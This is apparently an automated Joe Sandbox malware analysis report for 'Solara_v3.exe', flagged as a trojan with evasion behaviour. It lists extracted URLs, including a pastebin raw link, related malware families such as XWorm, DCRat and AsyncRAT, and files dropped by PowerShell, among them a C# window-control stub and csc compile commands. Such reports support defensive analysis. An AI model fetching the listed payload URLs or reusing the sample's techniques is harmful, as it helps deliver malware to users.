                                                                        https://github.com/beatgammit/base64-js/issues/42Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://url.spec.whatwg.org/#idnaSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://dom.spec.whatwg.org/#concept-event-path-appendSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/Microsoft/TypeScript/issues/2577)Solara_v3.exefalse
                                                                            high
                                                                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)Solara_v3.exefalse
                                                                              high
                                                                              https://github.com/golang/go/blob/master/LICENSESolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/CompileSolara_v3.exefalse
                                                                                  high
                                                                                  https://github.com/WICG/import-maps#the-import-mapSetSolara_v3.exefalse
                                                                                    high
                                                                                    http://man7.org/linux/man-pages/man2/shutdown.2.htmlSolara_v3.exefalse
                                                                                      high
                                                                                      https://wicg.github.io/import-maps/Solara_v3.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://html4/loose.dtdSolara_v3.exefalse
                                                                                        high
                                                                                        https://github.com/ctz/webpki-rootsSolara_v3.exefalse
                                                                                          high
                                                                                          https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8Solara_v3.exefalse
                                                                                            high
                                                                                            http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validatSolara_v3.exefalse
                                                                                                high
                                                                                                https://deno.land/std/examples/cat.tsSolara_v3.exefalse
                                                                                                  high
                                                                                                  https://github.com/clap-rs/clap/issuesH9bSolara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    high
                                                                                                    https://tools.ietf.org/html/rfc2046#section-5.1Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/github/fetch/blob/master/fetch.jsSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)Solara_v3.exefalse
                                                                                                            high
                                                                                                            https://github.com/vadimg/js_bintrees.Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://deno.land/manual/linking_to_external_code/import_mapsSolara_v3.exefalse
                                                                                                                high
                                                                                                                https://pastebin.com/raw/RsTRUBebSolara_v3.exe, 00000000.00000003.1750185198.0000009508082000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://dom.spec.whatwg.org/#event-pathSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://deno.land/std/examples/colors.tsSolara_v3.exefalse
                                                                                                                    high
                                                                                                                    http://.cssSolara_v3.exefalse
                                                                                                                      high
                                                                                                                      https://some/file.tsSolara_v3.exefalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://github.com/clap-rs/clap/issuesSolara_v3.exefalse
                                                                                                                        high
                                                                                                                        https://dl.deno.land/canary-latest.txtSolara_v3.exefalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://deno.land/std/Solara_v3.exefalse
                                                                                                                          high
                                                                                                                          https://w3c.github.io/user-timing)Solara_v3.exefalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://golang.org/pkg/io/#pkg-constantsSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://crbug.com/v8/8520Solara_v3.exefalse
                                                                                                                              high
                                                                                                                              https://fetch.spec.whatwg.org/#concept-construct-readablestreamSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://contoso.com/powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://deno.land/std/testing/asserts.tsSolara_v3.exefalse
                                                                                                                                    high
                                                                                                                                    https://github.com/denoland/deno/tree/master/test_pluginSolara_v3.exefalse
                                                                                                                                      high
                                                                                                                                      https://fetch.spec.whatwg.org/#dom-headersSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)Solara_v3.exefalse
                                                                                                                                        high
                                                                                                                                        https://dl.deno.land/canary/(bSolara_v3.exefalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/denoland/deno/issues/4591)Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://deno.land/manualSolara_v3.exefalse
                                                                                                                                            high
                                                                                                                                            http://.jpgSolara_v3.exefalse
                                                                                                                                              high
                                                                                                                                              https://deno.land/std/examples/welcome.tsSolara_v3.exefalse
                                                                                                                                                high
                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
IP: 104.20.3.235
Domain: pastebin.com
Country: United States
ASN: 13335
ASN Name: CLOUDFLARENET
Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585428
Start date and time: 2025-01-07 16:22:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Solara_v3.exe
Detection: MAL
Classification: mal80.troj.expl.evad.winEXE@10/10@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 3
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: Solara_v3.exe
Time | Type | Description
10:23:03 | API Interceptor | 15x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.20.3.235 | cr_asm3.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | gabe.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm_atCAD.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | vF20HtY4a4.exe | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | OSLdZanXNc.exe | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | 5UIy3bo46y.dll | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | Lm9IJ4r9oO.exe | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | BeginSync lnk.lnk | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | Get hash | malicious | Njrat | Browse | pastebin.com/raw/V9y5Q5vv
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
pastebin.com | Drivespan.dll | Get hash | malicious | Unknown | Browse | 104.20.3.235
pastebin.com | XClient.exe | Get hash | malicious | XWorm | Browse | 172.67.19.24
pastebin.com | ogVinh0jhq.exe | Get hash | malicious | DCRat | Browse | 104.20.4.235
pastebin.com | hiwA7Blv7C.exe | Get hash | malicious | Xmrig | Browse | 172.67.19.24
pastebin.com | CRf9KBk4ra.exe | Get hash | malicious | DCRat | Browse | 172.67.19.24
pastebin.com | dF66DKQP7u.exe | Get hash | malicious | XWorm | Browse | 104.20.3.235
pastebin.com | 2QaN4hOyJs.exe | Get hash | malicious | XWorm | Browse | 104.20.3.235
pastebin.com | bad.txt | Get hash | malicious | AsyncRAT | Browse | 104.20.3.235
pastebin.com | dlhost.exe | Get hash | malicious | XWorm | Browse | 104.20.4.235
pastebin.com | htkeUc1zJ0.exe | Get hash | malicious | Unknown | Browse | 104.20.4.235
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | https://publuu.com/flip-book/763064/1693399 | Get hash | malicious | Unknown | Browse | 104.16.124.96
CLOUDFLARENETUS | https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677 | Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse | 104.17.25.14
CLOUDFLARENETUS | SecurityScan_Release.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | SecurityScan_Release.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | http://11ofus.ca | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | [UPD]Intel_Unit.2.1.exe | Get hash | malicious | LummaC | Browse | 104.21.64.1
CLOUDFLARENETUS | Installer.exe | Get hash | malicious | LummaC, PureLog Stealer | Browse | 104.21.96.1
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
CLOUDFLARENETUS | setup.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
CLOUDFLARENETUS | setup.msi | Get hash | malicious | Unknown | Browse | 188.114.97.3
No context
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1564
Entropy (8bit): 5.645120317188671
Encrypted: false
SSDEEP: 48:HXSU4y4RQmFoUL5a+m9qr9tK8NLyAHS9OjlZS5GFU:HCHyIFKEg9qr2KLyzOZZ4wU
MD5: ADA690F327418BC5D6A9298C822A2375
SHA1: D64BF343FF681091C37C99129AE958CB04D6EA92
SHA-256: F035CE0138C48EA3EA1400DE942DAAA9B00756C01FA96EE67573B670297D6FF1
SHA-512: AC1C0B5A2B1B38994D25628A4D4C498F8A0053FCD4CD27F0BDBE3F3B46A66C3B815D1F69CA4E0E22CD5338E3032E585998F1A1830830E89D36F1ECB43FE51204
Malicious: false
Reputation: low
Preview: @...e...........\....................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Jan 7 16:45:36 2025, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1332
Entropy (8bit): 3.9830987711435037
Encrypted: false
SSDEEP: 24:HoFzW91+fRuHDfHewKEsmNwI+ycuZhNuakSGPNnqS2d:U4dKhmm1ulua36qSG
MD5: ABDEBE123BA9150F2D2B11C7213FF094
SHA1: 54BB74B674B39FF4FCD226B48C61D032CD18F374
SHA-256: 4FCEDB1AD183D51554BB190DEB168AC07AA18E320C11C43C8E701415722ABDD2
SHA-512: 85F1AB2E5C6C0892A662F9C333F4AC205F5CC8E82E8D326AEE766384E197DD24BE8E54FCCB1AA5E35D7AB3A2165E9077585DEAE4998750F335D195254CB29D46
Malicious: false
Reputation: low
Preview: L...0Z}g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP...............e.<...Q...a..6#w..........4.......C:\Users\user\AppData\Local\Temp\RES2A60.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.098935720238665
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQak7YnqqGPN5Dlq5J:+RI+ycuZhNuakSGPNnqX
MD5: 651C3CC402B151BA80C161BAC6362377
SHA1: 3B081F09D75FA7FAA115D88B8C3250E86BA1521D
SHA-256: F4178ABA35B6F4D299C57612410E1A5150589A3C9EE69DD308991A40DFD0E0DF
SHA-512: 4184F0C26843A06492C703F6429292E086173B0B4245091A2474640B1BECED9942CA405F0BE85335BF1DC33C9251A5EE09134CC0DC9BE0F98E484E2EB1068CED
Malicious: false
Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 353
Entropy (8bit): 4.82408068685792
Encrypted: false
SSDEEP: 6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
MD5: 379570600F5439DDA873EDA8F0CE4A79
SHA1: 2023B772101AFF5B12AB53F24A69742A4B9C394F
SHA-256: 2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
SHA-512: 70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
Malicious: false
Preview: . using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category: dropped
Size (bytes): 369
Entropy (8bit): 5.232412831427062
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fHAzxs7+AEszIwkn23fH9:p37Lvkmb6KRfvAWZEifv9
MD5: 64F479D8D45769FDFCEC5FC1058E5942
SHA1: 6283DB5ED22EA45BD847F377287F253D0A86EA38
SHA-256: EF7BBB19CE9A69C11E8B51A26F02DF802357876991EEC2CDA54D906F412E04E9
SHA-512: C018B802C897D4F2CB20BCDD6564B44F621A995E3205B4319B2341E4EEBCDF44EE166768064ED72A1E8FAA168993A825FD3676957A8F0E3F4602072FA9DC2BA1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.0.cs"
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.915722829653808
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSVW5GIYq/dudQ8OvkxkjvtkZfbQ99tEc8NoVWI+ycuZhNuakSGPNnq:6V9InudjdijOJq9t/Yl1ulua36q
                                                                                                                                                  MD5:6DE568C01223E0E59451296882F26EFB
                                                                                                                                                  SHA1:AE76B85030482D3C5E21A1E1CEB375BE763E6E3B
                                                                                                                                                  SHA-256:C0B387FA4F73A3B46272CFA18E801A512D5F7FA8CE3FA1C43082D2ABCB73E7C5
                                                                                                                                                  SHA-512:CD2E66D3007829587DA905A9D99A760C47EC06371DFBEB52F4FBC32265DD896D5221BE1A923FFC1EB854D4692C0F31DFC165F23F964F08774C497A57D236DA28
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0Z}g...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):869
                                                                                                                                                  Entropy (8bit):5.317670646568992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KJBId3ka6KRfJEifQKax5DqBVKVrdFAMBJTH:Ckka6CJEuQK2DcVKdBJj
                                                                                                                                                  MD5:E974653618A63F05A8DF46610E174134
                                                                                                                                                  SHA1:AF8357706EE3F954485DD6F14C95177ECD6CA0DC
                                                                                                                                                  SHA-256:E55647C65E971BEBFF92D28FBA6781DF7413755A358F669CCE4C58FC91ACD1BD
                                                                                                                                                  SHA-512:AD572C79A70A43D9C2F60FA52C0194A62493065E305D608E0A9CD372A2B9D227D3E9C96A44B8FDB983337E575B20A1A0D707A215C8EB68F6589AD6C1AD8C0BB7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):962
                                                                                                                                                  Entropy (8bit):5.425404696609983
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0k4+tgsZS2kX+TxXGBCDwQ0qSS0i4nHadvoX1Oa2Eb:0Ct62M+4Bi0qz0iQHaVoFl2Eb
                                                                                                                                                  MD5:EFB1C46B1B6A31E778F16D10CD394451
                                                                                                                                                  SHA1:08B70EFD646F7AF8A3D4564B4D29CDB8ED1805A5
                                                                                                                                                  SHA-256:275C4DDA9B63257793262721F694A39D8B902C6EA1235004D52DC6F2E2B55438
                                                                                                                                                  SHA-512:1D7320A03F85B3223EBF9796E5E4C6E8528DBA59595F9B5616C3A529F9910D2E2FC653AE795238F11C1D5208820BE049B5819F65B9F8DD3CD6ADD4B32661C727
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">Method invocation failed because [Win32] does not contain a method named 'GetWindowText'._x000D__x000A_</S><S S="Error">At line:19 char:5_x000D__x000A_</S><S S="Error">+ [Win32]::GetWindowText($hWnd, $sb, $sb.Capacity) | Out-Null_x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidOperation: (:) [], RuntimeException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : MethodNotFound_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
                                                                                                                                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Entropy (8bit):6.797140324313722
                                                                                                                                                  TrID:
                                                                                                                                                  • Win64 Executable Console (202006/5) 87.25%
                                                                                                                                                  • Visual Basic Script (13500/0) 5.83%
                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.19%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.87%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.86%
                                                                                                                                                  File name:Solara_v3.exe
                                                                                                                                                  File size:33'921'780 bytes
